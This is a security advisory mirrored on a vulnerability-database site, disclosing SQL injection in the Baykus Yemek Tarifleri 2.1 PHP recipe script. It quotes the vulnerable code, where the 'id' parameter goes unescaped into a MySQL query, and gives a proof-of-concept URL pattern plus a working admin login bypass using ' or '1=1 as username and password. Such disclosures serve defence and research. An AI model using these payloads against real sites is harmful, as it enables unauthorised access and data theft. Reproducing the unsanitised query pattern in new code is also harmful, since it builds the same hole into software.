Lucene search
K

Baykus Yemek Tarifleri SQL Injection

🗓️ 28 Feb 2010 00:00:00Reported by cr4wl3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Baykus Yemek Tarifleri SQL Injection Vulnerabilit

Code
`# Baykus Yemek Tarifleri <= 2.1 SQL Injection Vulnerability  
# By cr4wl3r  
# Download: http://scripti.org/i/Yemek.rar  
############################################################  
# Code:  
  
include("ayar.php");  
  
$ids= $_GET["id"];  
  
$yaz= mysql_fetch_array(mysql_query("select * from tarifler where id='$ids'"));  
  
mysql_select_db("yemek");   
  
mysql_query("SET NAMES ´latin5´");  
mysql_query("SET CHARACTER SET latin5");   
  
  
$baslik= $yaz["baslik"];  
$resim = $yaz['resim'];  
if($resim==""){  
$resim= "bos.png";  
}  
$kisa= $yaz["kisa"];  
$tarif= $yaz["metin"];  
############################################################  
# PoC: [path]/oku.php?id=[SQL]  
############################################################  
# Auth Bypass  
# [path]/Admin/giris.php  
# Username: ' or '1=1  
# password: ' or '1=1  
############################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation